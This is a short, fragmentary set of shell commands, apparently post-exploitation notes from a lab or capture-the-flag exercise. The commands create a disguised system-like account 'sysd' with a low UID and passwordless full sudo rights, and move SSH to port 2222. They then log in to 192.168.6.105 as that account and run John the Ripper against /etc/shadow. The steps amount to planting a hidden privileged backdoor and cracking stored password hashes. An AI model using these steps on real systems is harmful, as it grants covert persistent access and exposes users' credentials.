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useradd --no-create-home sysd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passwd sysd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usermod -u 127 sysd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groupmod -g 127 sysd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Nano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sysd ALL=(ALL:ALL) NOPASSWD:ALL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 sysd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-l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 the sshd_config file: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vi /etc/ssh/sshd_config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# Then make the following edits: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Port 22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Port 2222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Restart the SSH service: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systemctl restart sshd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exit # twice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ssh sysd@192.168.6.105 -p 2222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su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ssh sysd@192.168.6.105 -p 2222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su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john /etc/shadow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